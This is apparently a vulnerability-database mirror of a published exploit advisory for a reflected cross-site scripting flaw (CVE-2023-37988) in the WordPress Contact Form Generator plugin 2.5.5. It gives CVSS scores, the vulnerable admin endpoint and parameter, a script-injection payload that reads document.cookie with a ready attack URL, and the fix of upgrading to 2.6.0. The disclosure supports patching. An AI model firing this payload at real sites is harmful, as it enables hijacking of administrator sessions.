Lucene search

K
zdtArvandy1337DAY-ID-39092
HistoryOct 03, 2023 - 12:00 a.m.

WordPress Contact Form Generator 2.5.5 Cross Site Scripting Vulnerability

2023-10-0300:00:00
Arvandy
0day.today
296
wordpress
contact form
vulnerability
cross-site scripting
exploit
version 2.5.5
security patch

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS

0.001

Percentile

49.3%

# Exploit Title: WP Plugins Contact Form Generator 2.5.5 - Reflected Cross-Site Scripting
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/contact-form-generator/
# Vendor Homepage: https://www.creative-solutions.net/
# Version: 2.5.5 
# Tested on: Windows, Linux
# CVE: CVE-2023-37988

# Product Description
Contact Form Generator is a powerful contact form builder for WordPress! It is structured for creating Contact Forms, Application Forms, Reservation Forms, Survey Forms, Contact Data Pages and much more. You will get ready-to-use forms just after installation. Ref: https://wordpress.org/plugins/contact-form-generator/

# Vulnerability overview:
The Wordpress plugins Contact Form Generator (CFG) <= 2.5.5 is vulnerable to reflected cross-site scripting via the id parameter in the Edit Fields form. This vulnerability could allow an unauthenticated malicious actor to inject malicious scripts against high privilege users.

# Proof of Concept:
Affected Endpoint: /wp-admin/admin.php?page=cfg_fields&act=edit&id=
Affected Parameters: id
XSS Payload: "><script>alert(document.cookie)</script>x
http://example.com/wp-admin/admin.php?page=cfg_fields&act=edit&id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ex

# Recommendation
Upgrade to version 2.6.0

CVSS3

7.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

LOW

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

EPSS

0.001

Percentile

49.3%